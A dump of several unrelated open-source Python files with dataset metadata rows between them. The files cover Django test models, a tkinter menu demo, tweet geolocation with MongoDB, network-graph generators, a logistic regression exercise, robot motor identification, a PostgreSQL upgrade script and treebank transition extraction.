return self.dummy
class Meta:
verbose_name_plural = 'wrong'
class Model3(models.Model):
class Meta:
verbose_name_plural = 'wrong'
dummy = models.CharField(max_length=1)
def __unicode__(self):
return self.dummy
class Model4(models.Model):
dummy = models.CharField(max_length=1)
def __unicode__(self):
return self.dummy
class Model5(models.Model):
dummy = models.CharField(max_length=1)
def get_absolute_url(self):
return "/"
def __unicode__(self):
return self.dummy
class AbstractModel(models.Model):
foo = models.CharField(max_length=1)
class Meta:
abstract = True
class DerivedModel(AbstractModel):
bar = models.CharField(max_length=1)
class WeirdPrimaryKeyModel(models.Model):
primary_key = models.ForeignKey(Model1, primary_key=True)
unique_field = models.ForeignKey(Model2, unique=True)
not_both = models.ForeignKey(Model3, primary_key=True, unique=False)
class ManyToManyModel(models.Model):
nullable = models.ManyToManyField(Model2, null=True)
blank = models.ManyToManyField(Model3, blank=True)
class AdminKlass(admin.ModelAdmin):
search_fields = ('nullable',)
class Meta:
model = ManyToManyModel
| gpl-3.0 | -342,427,899,461,134,600 | 26.022989 | 72 | 0.68439 | false | 3.941324 | false | false | false |
saintdragon2/python-3-lecture-2015 | gui_practice/tkinter_02.py | 1 | 2021 | __author__ = 'saintdragon2'
#http://www.tutorialspoint.com/python/tk_menu.htm
from tkinter import Tk, Menu, Toplevel, Button
from tkinter.filedialog import askopenfilename
from tkinter.messagebox import showerror
def donothing():
filewin = Toplevel(root)
button = Button(filewin, text="Do nothing button")
button.pack()
def load_file():
fname = askopenfilename(filetypes=(("Template files", "*.tplate"),
("HTML files", "*.html;*.htm"),
("All files", "*.*") ))
if fname:
try:
# print("""here it comes: self.settings["template"].set(fname)""")
print(fname)
except: # <- naked except is a bad idea
showerror("Open Source File", "Failed to read file\n'%s'" % fname)
return
root = Tk()
menubar = Menu(root)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='New', command=donothing)
filemenu.add_command(label='Open', command=load_file)
filemenu.add_command(label='Save', command=donothing)
filemenu.add_command(label='Save as ...', command=donothing)
filemenu.add_command(label='Close', command=donothing)
filemenu.add_separator()
filemenu.add_command(label='Exit', command=root.quit)
menubar.add_cascade(label='File', menu=filemenu)
editmenu = Menu(menubar, tearoff=0)
editmenu.add_command(label='Undo', command=donothing)
editmenu.add_separator()
editmenu.add_command(label='Cut', command=donothing)
editmenu.add_command(label='Copy', command=donothing)
editmenu.add_command(label='Paste', command=donothing)
editmenu.add_command(label='Delete', command=donothing)
editmenu.add_command(label='Select All', command=donothing)
menubar.add_cascade(label='Edit', menu=editmenu)
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Help Index', command=donothing)
helpmenu.add_command(label='About ...', command=donothing)
menubar.add_cascade(label='Help', menu=helpmenu)
root.config(menu=menubar)
root.mainloop()
| mit | -443,248,091,811,062,340 | 33.844828 | 78 | 0.683325 | false | 3.324013 | false | false | false |
idl/Tweet_correlation | additional_modules/map_red_user_mongo.py | 1 | 4060 | import simplekml
import json
import datetime
import csv
from bson.code import Code
from pymongo import MongoClient
from math import radians, cos, sin, asin, sqrt
from random import choice
import operator
import csv
def haversine(lon1, lat1, lon2, lat2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
km = 6367 * c
return km
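# Quick sanity check (illustrative, not from the original script): one degree
# of longitude along the equator is roughly 111 km for this Earth radius.
#   >>> round(haversine(0.0, 0.0, 1.0, 0.0))
#   111.0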
def closest_neighbor(geo_dict):
data = {}
if geo_dict['n_loc'] == 1:
data['user'] = geo_dict['user']
data['loc'] = geo_dict['location'][0]
elif geo_dict['n_loc'] == 2:
data['user'] = geo_dict['user']
data['loc'] = choice(geo_dict['location'])
elif geo_dict['n_loc'] > 2:
pt_dict = {}
for i in range(len(geo_dict['location'])):
distance_list = []
for j in range(len(geo_dict['location'])):
distance = haversine(geo_dict['location'][i][0],geo_dict['location'][i][1],geo_dict['location'][j][0],geo_dict['location'][j][1])
distance_list.append(distance)
pt_dict[i] = reduce(lambda x, y: x + y, distance_list) / len(distance_list)
data['user'] = geo_dict['user']
data['loc'] = geo_dict['location'][max(pt_dict.iteritems(), key=operator.itemgetter(1))[0]]
else:
return data
data['n_loc'] = geo_dict['n_loc']
return data
def map_points(input_file):
geo_stuff = tw_spanish.map_reduce(mapper,reducer, "results")
#print geo_stuff
count = 0
geo_dict = {}
with open('./testmap_spanish_user.csv', 'wb') as csvfile:
mapwriter = csv.writer(csvfile)
mapwriter.writerow(['user','latitude','longitude','n_loc'])
for doc in geo_stuff.find():
geo_dict['user'] = doc['_id']['user']
value = doc['value']
if 'Geo' in value:
geo_dict['location'] = [value['Geo']]
geo_dict['n_loc'] = 1
elif 'Geo_list' in value:
geo_dict['location'] = value['Geo_list']
geo_dict['n_loc'] = value['n_pts']
            geo_data = closest_neighbor(geo_dict)
if geo_data != {}:
mapwriter.writerow([geo_data['user'],geo_data['loc'][0],geo_data['loc'][1], geo_data['n_loc']])
print geo_data
count += 1
print count
# f = open(input_file, "r" )
# with open('./testmap_spanish.csv', 'wb') as csvfile:
# mapwriter = csv.writer(csvfile)
# mapwriter.writerow(['time','latitude','longitude'])
# for each in f:
# tmp = each.split('\t')
# time = datetime.datetime.strptime(tmp[0][0:-5], '%Y-%m-%dT%H:%M:%S')
# geo = tmp[1].strip().split(', ')
# #print time, geo
# row = []
# row.append(time)
# row.append(geo[0])
# row.append(geo[1])
# try:
# mapwriter.writerow(row)
# except:
# mapwriter.writerow([unicode(s).encode("utf-8") for s in row])
if __name__ == '__main__':
client = MongoClient()
db = client.twitter_test
tw_spanish = db.spanish_tweets
mapper = Code("""function () {
emit({user:this.actor.id},{Geo: this.geo.coordinates});
}
"""
)
reducer = Code("""function(key,values) {
var list = [];
var count = 0;
values.forEach(function(value) {
if(value.Geo){
list.push(value.Geo);
count+=1;
}
})
return {Geo_list:list, n_pts:count};
}
"""
)
ifile = './output.txt'
map_points(ifile)
| mit | 6,387,345,091,163,661,000 | 26.066667 | 145 | 0.513547 | false | 3.484979 | false | false | false |
twosigma/beaker-notebook | beakerx/beakerx_magics/kernel_runner_magic.py | 1 | 1420 | # Copyright 2019 TWO SIGMA OPEN SOURCE, LLC #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython import get_ipython
from IPython.core.magic import (magics_class, cell_magic, Magics)
from beakerx_magics import KernelMagics
from ipykernel.zmqshell import ZMQInteractiveShell
@magics_class
class KernelRunnerMagic(Magics):
kernels = {}
def __init__(self, shell):
super(KernelRunnerMagic, self).__init__(shell)
@cell_magic
def kernel(self, line, cell):
if line not in self.kernels:
km = KernelMagics(self.shell)
km.start(line)
self.kernels[line] = km
return self.kernels[line].run_cell(line, cell)
def load_ipython_extension(ipython):
if isinstance(ipython, ZMQInteractiveShell):
ipython.register_magics(KernelRunnerMagic)
if __name__ == '__main__':
ip = get_ipython()
ip.register_magics(KernelRunnerMagic)
| apache-2.0 | 8,582,777,239,791,569,000 | 30.555556 | 74 | 0.709155 | false | 3.796791 | false | false | false |
hsnlab/mapping | generator/networkx_nffg_generator.py | 2 | 4896 | #!/usr/bin/python -u
#
# Copyright (c) 2016 Balazs Nemeth
#
# This file is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
import importlib
import random
import string
from sg_generator import NameGenerator
from generator import NFFG
def get_networkx_func (func_name, seed=0, **kwargs):
"""
Uses 'func_name' graph generator of NetworkX library to create a NetworkX
graph which can be used as topology.
"""
nx_func = getattr(importlib.import_module("networkx"), func_name)
generated_graph = nx_func(seed=seed, **kwargs)
return generated_graph
def networkx_resource_generator (func_name, seed=0, max_cpu=40, max_mem=16000,
max_storage=30, max_link_bw=70,
abc_nf_types_len=10,
supported_nf_cnt=6, max_link_delay=2,
sap_cnt=10,
**kwargs):
"""
Uses a NetworkX graph to create a request NFFG.
:param func_name: string of NetworkX lib's random graph generator function
name
:param seed:
:param max_cpu:
:param max_mem:
:param max_storage:
:param max_link_bw:
:param abc_nf_types_len:
:param supported_nf_cnt:
:param max_link_delay:
:param sap_cnt:
:param kwargs:
:return:
"""
rnd = random.Random()
rnd.seed(seed)
nx_graph = get_networkx_func(func_name, seed=seed, **kwargs)
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="net-" + func_name + "-seed" + str(seed))
gen = NameGenerator()
for infra_id in nx_graph.nodes_iter():
infra = nffg.add_infra(id=infra_id,
bandwidth=rnd.random() * max_link_bw * 1000,
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
infra.add_supported_type(rnd.sample(nf_types, supported_nf_cnt))
for i, j in nx_graph.edges_iter():
infra1 = nffg.network.node[i]
infra2 = nffg.network.node[j]
nffg.add_undirected_link(port1=infra1.add_port(id=gen.get_name("port")),
port2=infra2.add_port(id=gen.get_name("port")),
p1p2id=gen.get_name("link"),
p2p1id=gen.get_name("link"),
dynamic=False,
delay=rnd.random() * max_link_delay,
bandwidth=rnd.random() * max_link_bw)
infra_ids = [i.id for i in nffg.infras]
for s in xrange(0, sap_cnt):
sap_obj = nffg.add_sap(id=gen.get_name("sap"))
sap_port = sap_obj.add_port(id=gen.get_name("port"))
infra_id = rnd.choice(infra_ids)
infra = nffg.network.node[infra_id]
nffg.add_undirected_link(port1=sap_port,
port2=infra.add_port(id=gen.get_name("port")),
p1p2id=gen.get_name("link"),
p2p1id=gen.get_name("link"),
dynamic=False,
delay=rnd.random() * max_link_delay,
bandwidth=rnd.uniform(max_link_bw / 2.0,
max_link_bw))
return nffg
def networkx_request_generator (func_name, seed=0, max_cpu=4, max_mem=1600,
max_storage=3, max_link_bw=7,
abc_nf_types_len=10, max_link_delay=2,
sap_cnt=10,
**kwargs):
rnd = random.Random()
rnd.seed(seed)
nx_graph = get_networkx_func(func_name, seed=seed, **kwargs)
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="req-" + func_name + "-seed" + str(seed))
nffg.mode = NFFG.MODE_ADD
for nf_id in nx_graph.nodes_iter():
nf = nffg.add_nf(id=nf_id, func_type=rnd.choice(nf_types),
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
for i, j in nx_graph.edges_iter():
"""TODO: How to direct the randomly generated graph's edges."""
pass
return nffg
if __name__ == "__main__":
print networkx_resource_generator("erdos_renyi_graph", seed=5, n=6, p=0.3,
sap_cnt=15).dump()
| apache-2.0 | -4,967,591,907,117,210,000 | 35.81203 | 78 | 0.566381 | false | 3.450317 | false | false | false |
mlyundin/Machine-Learning | ex3/ex3.py | 1 | 1834 | import scipy.io as sio
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import minimize
from common_functions import add_zero_feature, cf_lr as cost_function, gf_lr as grad_function, \
cf_lr_reg as cost_function_reg, gf_lr_reg as grad_function_reg
if __name__ == '__main__':
data = sio.loadmat('ex3data1.mat')
y = data['y']
X = data['X']
# replace 10 by 0
y = y % 10
n_sampels = 100
sampels = np.random.choice(len(X), n_sampels)
fig = plt.figure(figsize=(8, 8)) # figure size in inches
fig.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i, j in enumerate(sampels):
ax = fig.add_subplot(10, 10, i + 1, xticks=[], yticks=[])
ax.imshow(X[j, :].reshape(20, 20).T, cmap=plt.cm.binary, interpolation='nearest')
ax.text(0, 7, str(y[j, 0]))
plt.show()
num_labels = 10
X = add_zero_feature(X)
m, n = X.shape
initial_theta = np.ones((n, 1))
all_theta = np.vstack([minimize(cost_function, initial_theta, method='BFGS', jac=grad_function, options={'disp': True, 'maxiter':100},
args=(X, (y == i).astype(int))).x for i in range(num_labels)])
y_pred = np.argmax(np.dot(X, all_theta.T), axis=1)
print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100)
# Use regularization
lambda_coef = 0.1
all_theta = np.vstack([minimize(cost_function_reg, initial_theta, method='BFGS', jac=grad_function_reg, options={'disp': True, 'maxiter':100},
args=(X, (y == i).astype(int), lambda_coef)).x for i in range(num_labels)])
y_pred = np.argmax(np.dot(X, all_theta.T), axis=1)
print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100) | mit | -2,395,002,424,882,177,000 | 34.72 | 146 | 0.592694 | false | 3.06689 | false | false | false |
proyan/sot-torque-control | python/dynamic_graph/sot/torque_control/identification/identify_motor_static.py | 1 | 5833 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 18:47:50 2017
@author: adelpret
"""
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from identification_utils import solve1stOrderLeastSquare
from dynamic_graph.sot.torque_control.hrp2.control_manager_conf import IN_OUT_GAIN
def identify_motor_static(enc, dq, ctrl, current, tau, JOINT_ID, JOINT_NAME, ZERO_VELOCITY_THRESHOLD,
ZERO_VELOCITY_THRESHOLD_SMALL, SHOW_THRESHOLD_EFFECT):
# remove high velocity
maskConstAng = (abs (dq)<ZERO_VELOCITY_THRESHOLD)
# erode to get only steady phases where velocity is small
maskConstAng=ndimage.morphology.binary_erosion(maskConstAng,None,100)
maskPosVel=(dq> ZERO_VELOCITY_THRESHOLD_SMALL)
maskNegVel=(dq<-ZERO_VELOCITY_THRESHOLD_SMALL)
maskConstPosAng=np.logical_and( maskConstAng ,maskPosVel )
maskConstNegAng=np.logical_and( maskConstAng ,maskNegVel )
if SHOW_THRESHOLD_EFFECT :
plt.figure()
plt.plot(enc, label='q')
q_const=enc.copy()
q_const[np.logical_not(maskConstAng)]=np.nan
plt.plot(q_const, label='q_const')
plt.legend()
# identify current sensor gain
x = current[maskConstAng]
y = ctrl[maskConstAng]/IN_OUT_GAIN
maskPosErr = np.logical_and(y - x > 0.0, np.abs(x)>0.5)
maskNegErr = np.logical_and(y - x < 0.0, np.abs(x)>0.5)
print "Number of samples with constant angle:", x.shape[0]
print "Number of samples with constant angle and pos vel:", x[maskPosErr].shape[0]
print "Number of samples with constant angle and neg vel:", x[maskNegErr].shape[0]
if(x[maskPosErr].shape[0]<10):
(Ks,DZ)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr])
elif(x[maskNegErr].shape[0]<10):
(Ks,DZ)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr])
else:
(Ksn,DZn)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr])
(Ksp,DZp)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr])
Ks = 0.5*(Ksp+Ksn);
Ks = min([Ksp, Ksn]);
DZ = 0.5*(DZp-DZn);
print "Current sensor gains = ", Ksp, Ksn;
print "Deadzones = ", DZp, -DZn;
x_neg = x[maskNegErr]
y_neg = y[maskNegErr]
plt.figure()
plt.plot(x_neg, y_neg,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([min(x_neg),max(x_neg)],[Ksn*min(x_neg)+DZn ,Ksn*max(x_neg)+DZn],'g:',lw=3)
plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$')
plt.title('Negative current errors - Joint '+JOINT_NAME)
x_pos = x[maskPosErr]
y_pos = y[maskPosErr]
plt.figure()
plt.plot(x_pos, y_pos,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([min(x_pos),max(x_pos)],[Ksp*min(x_pos)+DZp ,Ksp*max(x_pos)+DZp],'g:',lw=3)
plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$')
plt.title('Positive current errors - Joint '+JOINT_NAME)
plt.show()
if(Ks<0.0):
print "ERROR: estimated Ks is negative! Setting it to 1"
Ks = 1.0;
# plot dead zone effect ********************************************
plt.figure()
plt.plot(Ks*current, label='current')
plt.plot(ctrl/IN_OUT_GAIN, label='control')
plt.legend()
plt.figure()
y = Ks*current[maskConstAng]
x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng]
plt.ylabel(r'$i(t)$')
plt.xlabel(r'$ctrl(t)-i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err');
plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err');
plt.legend()
plt.figure()
y = ctrl[maskConstAng]/IN_OUT_GAIN
x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng]
plt.ylabel(r'$ctrl(t)$')
plt.xlabel(r'$ctrl(t)-i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err');
plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err');
plt.legend()
plt.figure()
y = ctrl/IN_OUT_GAIN
x = Ks*current
plt.ylabel(r'$ctrl(t)$')
plt.xlabel(r'$i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([-3,3],[-3,3]);
plt.show()
# y = a. x + b
# i = Kt.tau + Kf
# Identification ***************************************************
y = current #*Ks
x = tau
(Ktp,Kfp)=solve1stOrderLeastSquare(x[maskConstPosAng],y[maskConstPosAng])
(Ktn,b)=solve1stOrderLeastSquare(x[maskConstNegAng],y[maskConstNegAng])
Kfn=-b
# Plot *************************************************************
plt.figure()
plt.axhline(0, color='black',lw=1)
plt.axvline(0, color='black',lw=1)
plt.plot(x ,y ,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskConstPosAng],y[maskConstPosAng],'rx',lw=3,markersize=1);
plt.plot(x[maskConstNegAng],y[maskConstNegAng],'bx',lw=3,markersize=1);
#plot identified lin model
plt.plot([min(x),max(x)],[Ktp*min(x)+Kfp ,Ktp*max(x)+Kfp],'g:',lw=3)
plt.plot([min(x),max(x)],[Ktn*min(x)-Kfn ,Ktn*max(x)-Kfn],'g:',lw=3)
plt.ylabel(r'$i(t)$')
plt.xlabel(r'$\tau(t)$')
plt.title('Static experiment - Joint '+JOINT_NAME)
print "cur_sens_gain[%d] = %f" % (JOINT_ID, Ks);
print 'deadzone[%d] = %f' % (JOINT_ID, DZ);
print 'Kt_p[%d] = %f' % (JOINT_ID,Ktp);
print 'Kt_n[%d] = %f' % (JOINT_ID,Ktn);
print 'Kf_p[%d] = %f' % (JOINT_ID,Kfp);
print 'Kf_n[%d] = %f' % (JOINT_ID,Kfn);
print 'Kt_m[%d] = %f' % (JOINT_ID,(Ktp+Ktn)/2.0);
print 'Kf_m[%d] = %f' % (JOINT_ID,(Kfp+Kfn)/2.0);
return (Ktp, Ktn, Ks, DZ); | gpl-3.0 | 1,240,813,674,669,772,500 | 39.797203 | 102 | 0.572947 | false | 2.683073 | false | false | false |
sassoftware/mint | mint/scripts/postgres_auto_update.py | 1 | 7720 | #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Shut down PostgreSQL, check if it needs updating, then start it again.
"""
import logging
import optparse
import os
import signal
import subprocess
import tempfile
import time
import traceback
from conary.lib import cfg as cfgmod
from conary.lib import cfgtypes
from conary.lib import util as cny_util
from mint import config
from mint.scripts import postgres_major_migrate
log = logging.getLogger('auto_update')
class PostgresMeta(cfgmod.ConfigFile):
version = cfgtypes.CfgString
binDir = cfgtypes.CfgPath
dataDir = cfgtypes.CfgPath
class Script(postgres_major_migrate.Script):
logFileName = 'scripts.log'
newLogger = True
port = 5439
user = 'postgres'
dataTop = '/srv/pgsql'
currentMetaPath = '/srv/rbuilder/data/postgres-meta'
nextMetaPath = '/usr/share/rbuilder/postgres-meta'
def action(self):
parser = optparse.OptionParser()
parser.add_option('-c', '--config-file',
default=config.RBUILDER_CONFIG)
parser.add_option('-q', '--quiet', action='store_true')
parser.add_option('--init', action='store_true')
options, args = parser.parse_args()
self.loadConfig(options.config_file)
self.resetLogging(quiet=options.quiet)
currentMeta = self.getCurrentMeta()
nextMeta = self.getNextMeta()
if currentMeta and currentMeta.dataDir == nextMeta.dataDir:
return 0
self.stopPostgres()
if not currentMeta:
self.initdb(nextMeta)
else:
self.migrateMeta(currentMeta, nextMeta)
self.startPostgres()
def stopPostgres(self):
"""Kill postgres by checking its UNIX socket."""
log.info("Stopping PostgreSQL on port %s", self.port)
sockPath = '/tmp/.s.PGSQL.%s' % self.port
# Send progressively more aggressive sigals until it dies.
signals = ([signal.SIGINT] * 4
) + ([signal.SIGQUIT] * 2
) + [signal.SIGKILL]
while signals:
if not os.path.exists(sockPath):
return
signum = signals.pop(0)
if not self._stopPostgres(sockPath, signum):
# No process is listening on that socket.
return
sleepUntil = time.time() + 15
while time.time() < sleepUntil:
if not os.path.exists(sockPath):
return
time.sleep(0.1)
@staticmethod
def _stopPostgres(sockPath, signal):
# Use netstat to figure out what processes own the socket.
netstat = subprocess.Popen(['netstat', '-lpnxT'],
shell=False, stdout=subprocess.PIPE).communicate()[0]
found = False
for line in netstat.splitlines():
words = line.split()
if sockPath not in words:
continue
i = words.index(sockPath)
process = words[i-1]
pid, name = process.split('/')
if name not in ('postmaster', 'postgres'):
continue
os.kill(int(pid), signal)
found = True
return found
def getCurrentMeta(self):
"""Get metadata about the current PostgreSQL cluster."""
cfg = PostgresMeta()
if os.path.exists(self.currentMetaPath):
cfg.read(self.currentMetaPath)
return cfg
# rBuilder <= 5.8.0 doesn't have a meta file. Use the highest-numbered
# datadir as the "current" cluster.
if not os.path.isdir(self.dataTop):
return None
versions = []
for name in os.listdir(self.dataTop):
if name[-9:] != '-rbuilder':
continue
path = os.path.join(self.dataTop, name)
version = name[:-9]
try:
parts = [int(x) for x in version.split('.')]
except ValueError:
continue
versions.append((parts, version, path))
if not versions:
# No postgres data dir found.
return None
versions.sort()
_, cfg.version, cfg.dataDir = versions[-1]
cfg.binDir = '/opt/postgresql-%s/bin' % (cfg.version,)
cfg.writeToFile(self.currentMetaPath, includeDocs=False)
return cfg
def getNextMeta(self):
"""Get metadata about the version of PostgreSQL that will be used after
the (possible) upgrade.
"""
cfg = PostgresMeta()
cfg.read(self.nextMetaPath)
return cfg
def updateMeta(self, nextMeta):
"""Update the "current" metadata file."""
nextMeta.writeToFile(self.currentMetaPath, includeDocs=False)
def initdb(self, meta):
"""Create a new postgres cluster at the given location."""
log.info("Initializing PostgreSQL %s cluster", meta.version)
assert not os.path.exists(meta.dataDir)
self.loadPrivs(user=self.user)
parentDir = os.path.dirname(meta.dataDir)
if not os.path.isdir(parentDir):
os.makedirs(parentDir)
tempDir = tempfile.mkdtemp(dir=parentDir)
try:
os.chown(tempDir, self.uidgid[0], self.uidgid[1])
self.dropPrivs()
cluster = postgres_major_migrate.Postmaster(dataDir=tempDir,
binDir=meta.binDir, port=65000,
logPath='/tmp/postgres-initdb.log')
cluster.initdb()
self.restorePrivs()
self.updateMeta(meta)
os.rename(tempDir, meta.dataDir)
finally:
try:
if os.path.isdir(tempDir):
try:
self.restorePrivs()
except:
traceback.print_exc()
log.info("Cleaning up temporary target dir")
cny_util.rmtree(tempDir)
except:
traceback.print_exc()
def migrateMeta(self, currentMeta, nextMeta):
"""Migrate postgres cluster to a new version and datadir."""
log.info("Migrating PostgreSQL from %s to %s", currentMeta.version,
nextMeta.version)
assert currentMeta.dataDir != nextMeta.dataDir
if os.path.exists(nextMeta.dataDir):
# Nuke any existing data directory -- either an explicit meta file
# told us that a different datadir is in use, or the heuristic
# decided there was nothing of value in this one.
cny_util.rmtree(nextMeta.dataDir)
self.runMigration(
from_bindir=currentMeta.binDir,
from_datadir=currentMeta.dataDir,
from_port=None,
to_bindir=nextMeta.binDir,
to_datadir=nextMeta.dataDir,
user=self.user,
)
self.updateMeta(nextMeta)
os.rename(currentMeta.dataDir, currentMeta.dataDir + '.old')
def startPostgres(self):
os.system("/sbin/service postgresql-rbuilder start")
cluster = postgres_major_migrate.DummyCluster(self.port, user=self.user)
cluster.waitForPostgres()
| apache-2.0 | -2,299,280,373,432,593,200 | 33.618834 | 80 | 0.595337 | false | 4.15277 | true | false | false |
wmaier/treetools | trees/transitions.py | 1 | 9924 | """treetools: Tools for transforming treebank trees.
This module provides functions and classes for transition extraction.
Author: Wolfgang Maier <[email protected]>
"""
import argparse
import sys
from . import trees, treeinput, transform
from . import misc, transitionoutput
class Transition():
def __init__(self, name):
self.name = name
def pretty_print(self):
return self.name
def __str__(self):
return self.name
def topdown(tree):
"""Extract transitions topdown for continuous trees.
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = []
for node in trees.preorder(tree):
children = trees.children(node)
if len(children) == 0:
transitions.append(Transition("SHIFT"))
elif len(children) == 1:
transitions.append(Transition("UNARY-%s" % node.data["label"]))
elif len(children) == 2:
if 'head' not in children[0].data:
raise ValueError("heads are supposed to be marked")
headside = "LEFT" if children[0].data['head'] else "RIGHT"
transitions.append(Transition("BINARY-%s-%s" %
(headside, node.data["label"])))
else:
raise ValueError("trees must be binarized")
print(terminals, [str(t)
for t in list(reversed(transitions))], file=sys.stderr)
return terminals, list(reversed(transitions))
def _inorder(tree):
"""Recursive inorder transition
"""
transitions = []
c = trees.children(tree)
if len(trees.children(c[0])) == 0:
transitions.append(Transition("SHIFT"))
else:
transitions.extend(_inorder(c[0]))
transitions.append(Transition("PJ-{}".format(tree.data['label'])))
for child in c[1:]:
if len(trees.children(child)) == 0:
transitions.append(Transition("SHIFT"))
else:
transitions.extend(_inorder(child))
transitions.append(Transition("REDUCE"))
return transitions
def inorder(tree):
"""Extract inorder transitions for continuous trees.
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = _inorder(tree)
return terminals, transitions
def gap(tree):
"""GAP transition parsing (Coavoux & Crabbe)
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = []
b = [terminal for terminal in trees.terminals(tree)]
d = []
s = []
while True:
if len(s) > 0 and len(d) > 0 and d[0].parent == s[0].parent:
# REDUCE
p = s[0].parent
if 'head' not in s[0].data or 'head' not in d[0].data:
raise ValueError("heads are supposed to be marked")
headside = "LEFT" if s[0].data['head'] else "RIGHT"
t = Transition("R-{}-{}".format(headside, p.data['label']))
transitions.append(t)
s = s[1:]
d = d[1:]
while len(d) > 0:
s = [d.pop(0)] + s
d = [p] + d
elif len(d) > 0 and any([n.parent == d[0].parent for i,n in enumerate(s)]):
# GAP
for i, n in enumerate(s):
if n.parent == d[0].parent:
for j in range(i):
d.append(s.pop(0))
t = Transition("GAP")
transitions.append(t)
break
else:
t = Transition("SHIFT")
transitions.append(t)
while len(d) > 0:
s = [d.pop(0)] + s
d = [b.pop(0)] + d
if len(s) == 0 and len(b) == 0 and len(d) == 1:
break
# check for unary
while len(d) > 0 and d[0].parent and len(trees.children(d[0].parent)) == 1:
t = Transition("UNARY-{}".format(d[0].parent.data['label']))
transitions.append(t)
d[0] = d[0].parent
return terminals, transitions
def add_parser(subparsers):
"""Add an argument parser to the subparsers of treetools.py.
"""
parser = subparsers.add_parser('transitions',
usage='%(prog)s src dest '
'transtype [options] ',
formatter_class=argparse.
RawDescriptionHelpFormatter,
description='transition extraction from'
' treebank trees')
parser.add_argument('src', help='input file')
parser.add_argument('dest', help='prefix of output files')
parser.add_argument('transtype', metavar='T', choices=[t for t in TRANSTYPES],
help='type of transitions (default: %(default)s)',
default='topdown')
parser.add_argument('--transform', metavar='TS', choices=[fun.__name__ for fun in
transform.TRANSFORMATIONS],
nargs='+',
help='tree transformations to apply before extraction',
default=[])
parser.add_argument('--transformparams', metavar='TSP',
nargs='+', help='tree transformations parameters',
default=[])
parser.add_argument('--src-format', metavar='FMT',
choices=[fun.__name__
for fun in treeinput.INPUT_FORMATS],
help='input format (default: %(default)s)',
default='export')
parser.add_argument('--src-enc', metavar='ENCODING',
help='input encoding (default: %(default)s)',
default='utf-8')
parser.add_argument('--src-opts', nargs='+', metavar='O',
help='space separated list of options O for reading '
'input of the form key:value '
'(default: %(default)s)',
default=[])
parser.add_argument('--dest-format', metavar='FMT',
help='grammar format (default: %(default)s)',
default='plain')
parser.add_argument('--dest-enc', metavar='ENCODING',
help='grammar encoding (default: %(default)s)',
default='utf-8')
parser.add_argument('--dest-opts', nargs='+', metavar='O',
help='space separated list of options O for writing '
'the transitions of the form key:value '
'(default: %(default)s)',
default=[])
parser.add_argument('--verbose', action='store_true', help='More verbose '
'messages', default=False)
parser.add_argument('--usage', nargs=0, help='show detailed information '
'about available tasks and input format/options',
action=UsageAction)
parser.set_defaults(func=run)
return parser
